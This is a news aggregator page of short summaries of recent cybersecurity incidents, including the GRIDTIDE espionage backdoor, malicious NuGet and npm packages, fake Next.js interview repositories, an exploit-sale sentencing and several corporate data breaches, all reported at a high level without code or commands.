All news in category “Incidents and Data Breaches”

🛡️ In episode 456 of Smashing Security, Graham Cluley and guest Paul Ducklin examine allegations that an internet archiving service operator weaponised its own CAPTCHA to DDoS a Finnish blogger, tampered with archive content to smear them, and issued bizarre threats about AI-generated pornography. The hosts also cover a ransomware crew that accidentally corrupted victims' decryption keys, rendering extortion efforts ineffective. The episode closes with a calm Pick of the Week and a furious rant about web forms.

🔒 UFP Technologies disclosed a cybersecurity incident detected on February 14 that compromised portions of its IT environment and resulted in data theft. The company says it isolated affected systems, engaged external cybersecurity advisors, and believes the intruder has been removed with access restored in all material respects. Some functions such as billing and label making were impacted, and the firm is investigating whether personal information was exfiltrated.

⚠️ A coordinated campaign impersonating Next.js job interview materials uses malicious repositories to achieve remote code execution on developers' machines. Repositories trigger payloads via VS Code workspace opening, npm dev server startup, or backend initialization, downloading and executing an in-memory JavaScript backdoor. The staged malware profiles hosts, registers with a C2 infrastructure, and supports file enumeration and staged exfiltration. Microsoft advises enforcing VS Code Workspace Trust, reducing secrets on endpoints, and using short-lived, least-privilege tokens.

🔒 Google and industry partners disrupted infrastructure used by suspected China-linked espionage group UNC2814, which deployed a C-based backdoor named GRIDTIDE that abuses the Google Sheets API to conceal command-and-control traffic. GRIDTIDE supports file upload/download and arbitrary shell execution and was observed on endpoints containing PII. Google terminated attacker-controlled Cloud projects, disabled abused accounts, and is notifying impacted organizations while offering support.

🔐 Google’s Threat Intelligence Group, Mandiant, and partners disrupted a global espionage campaign attributed to a suspected Chinese actor tracked as UNC2814 that infiltrated telecom firms and government agencies across dozens of countries. The actor deployed a new C-based backdoor named GRIDTIDE that abused the Google Sheets API for covert command-and-control, authenticating with a hardcoded service account key and polling spreadsheet cells for instructions. GRIDTIDE supports execution, upload and download commands via URL-safe Base64 exchanges and hides output in sheet cells; Google and partners disabled cloud projects, revoked API access, sinkholed domains, and offered victim support.

🔒 Cisco Talos reports active exploitation of CVE-2026-20127 in Cisco Catalyst SD-WAN Controller, enabling unauthenticated attackers to bypass authentication and obtain administrative privileges. Talos attributes the activity to a sophisticated actor tracked as UAT-8616 and finds evidence dating to 2023, including software downgrades and subsequent exploitation of CVE-2022-20775 to escalate to root. Customers are urged to follow vendor advisories, validate control peering events, and apply the detection and remediation guidance provided.

🔒 Marquis Software Solutions has filed suit against SonicWall, alleging gross negligence and misrepresentation after a ransomware attack on August 14, 2025 that followed a compromise of a SonicWall firewall. Investigators say the attacker accessed configuration backups stored in SonicWall’s MySonicWall cloud—an exposure Marquis attributes to an API code change in February 2025—and used configuration data and AES-256-encrypted credentials to bypass MFA. The stolen files included extensive personal and financial information; Marquis says the incident disrupted operations for 74 U.S. banks and forced the firm to defend more than 36 consumer class actions while seeking monetary damages, indemnification and equitable relief.

🛡️ Google Threat Intelligence Group, Mandiant, and partners executed a coordinated disruption against a global espionage campaign attributed to UNC2814 that abused cloud services for covert command and control. Investigators identified a novel C-based backdoor called GRIDTIDE that uses Google Sheets APIs as a high-availability C2 channel, protected by an AES-128-CBC key and service account credentials. Actions included terminating attacker-controlled Google Cloud projects, disabling accounts and Sheets API access, sinkholing infrastructure, and publishing IOCs and detection guidance to support defenders.

⚠️ ReversingLabs uncovered a malicious NuGet package named StripeApi.Net that impersonated the widely used Stripe.net .NET library for Stripe payments. The typosquatting listing duplicated icons, documentation and tags and used the publisher name 'StripePayments' while retaining a default avatar to appear credible. The fake package accrued an apparently inflated 180,000-plus downloads by spreading roughly 300 downloads across 506 versions. Subtle code changes captured Stripe API keys and a machine identifier and exfiltrated them to an attacker-controlled Supabase database; NuGet removed the package quickly after it was reported and investigators found only a test entry.

🔒 Security researchers at Socket uncovered four malicious NuGet packages — NCryptYo, DOMOAuth2_, IRAOAuth2.0, and SimpleWriter_ — that target ASP.NET developers to steal Identity data and manipulate authorization rules. The packages, published in August 2024 by user hamzazaheer and downloaded over 4,500 times before removal, deploy a localhost proxy and stage payloads to relay stolen data to an external C2. Separately, Tenable disclosed a malicious npm package ambar-src that used a preinstall hook to drop cross-platform malware (Windows, Linux, macOS), enabling full-system compromise and data exfiltration.

🛡️ Microsoft warns that a coordinated campaign is using job-themed repositories—often posing as Next.js projects or technical assessments—to infect developer systems with multi-stage backdoors. Attackers embed workspace automation, build scripts, or server startup hooks so simply opening or building a project can load remote JavaScript and execute in memory. Microsoft advises containing affected endpoints, tracing process trees, hunting for repeated polling to attacker infrastructure, enforcing VS Code Workspace Trust, applying attack surface reduction, enabling cloud reputation checks, and tightening developer trust boundaries.

🔒 A former senior executive at L3Harris cyber-division Trenchant, Australian national Peter Williams, has been sentenced to 87 months in prison after pleading guilty to stealing and selling zero-day exploits to a Russian broker. He admitted taking eight cyber-exploit components over three years, accepting cryptocurrency payments and providing paid follow-on support. Authorities say the theft cost Trenchant/L3Harris about $35m and posed significant national security risks. Williams was ordered to forfeit $1.3m, cryptocurrency, property and luxury items, and to serve three years of supervised release with special conditions.

🔒A Ukrainian man was sentenced to five years in prison after admitting he helped North Korean IT workers infiltrate US companies using stolen identities. He pleaded guilty in November 2025 to aggravated identity theft and conspiracy to commit fraud and agreed to forfeit over $1.4 million in cash and cryptocurrency. Authorities say he sold hundreds of stolen identities and provided proxy accounts and laptop farms to disguise foreign workers as US-based.

🔒 Peter Williams, a 39-year-old former senior employee at L3Harris, was sentenced to just over seven years in prison after pleading guilty to selling eight zero-day exploits to the Russian exploit broker Operation Zero. Prosecutors say he received up to $4 million in cryptocurrency and has been ordered to forfeit proceeds, including properties and luxury items. The theft, which occurred between 2022 and 2025, targeted tools intended for sale only to the U.S. government and select allies and prompted criminal charges and sanctions.

🔒 Peter Williams, former head of Trenchant at L3Harris, was sentenced to 87 months in federal prison after admitting he stole and sold zero-day exploit components to the Russian broker Operation Zero. Prosecutors say he transferred at least eight protected exploit components between 2022 and 2025 using a portable external drive and encrypted channels. L3Harris estimates the theft caused $35 million in losses and the sales netted Williams $1.3 million in cryptocurrency. Authorities ordered forfeiture of the crypto, a house, and luxury items, and the U.S. Treasury announced sanctions against the broker.

🛡️ AWS security researchers report a Russian-speaking attacker compromised more than 600 FortiGate firewalls between January 11 and February 18, 2026, by exploiting weak or default passwords rather than product vulnerabilities. The actor used a Google Gemini-based AI tool to pivot to additional hosts and deployed reconnaissance tools written in Go and Python. Analysts found clear signs of AI-assisted code generation. Experts urge strong passwords and enabling MFA.

🔒 Malwarebytes researchers warn of a convincing fake Zoom meeting page that silently downloads and installs a covert build of Teramind on Windows endpoints. Victims see scripted participants and an “Update Available” countdown that triggers a silent download while a fake Microsoft Store screen displays a staged installation. Because the payload is a repackaged commercial monitoring tool, many defenses may not flag it, so prompt verification and training are essential.

📧 A financially motivated threat group dubbed Diesel Vortex has run an extensive phishing campaign since September 2025 targeting freight and logistics operators across the U.S. and Europe, using roughly 52 domains to harvest credentials. Researchers at Have I Been Squatted and partner Ctrl-Alt-Intel discovered exposed repositories and Telegram webhook logs revealing the group's tooling, communications, and an internal mind map describing a call-center style operation. The campaign stole 1,649 unique credential pairs and employed sophisticated evasion — Cyrillic homoglyphs, a nine-stage cloaking chain, voice phishing, Telegram infiltration, and pixel-perfect clones — before coordinated takedowns disrupted the infrastructure.

🔒 Wynn Resorts confirmed an employee data breach after being listed on the ShinyHunters extortion group's leak site and said it activated incident response procedures. The company engaged external cybersecurity experts to investigate and reported that an unauthorized third party acquired certain employee data. Attackers claimed the stolen data had been deleted; Wynn said it has seen no evidence of publication or misuse to date and that guest operations remain unaffected. The company is offering complimentary credit monitoring and identity protection services to employees.

🔓 The extortion group ShinyHunters published a 6.1GB archive on February 21 containing 12.4 million records it alleges were stolen from CarGurus. Have I Been Pwned (HIBP) has added the dataset and reports compromised data types including email addresses, IPs, full names, phone numbers, physical addresses, account IDs, finance application data, dealer details, and subscription information. CarGurus has not confirmed the breach or replied to requests for comment. HIBP says about 70% of the records were already known, leaving roughly 3.7 million newly exposed entries that could be abused for phishing and other scams.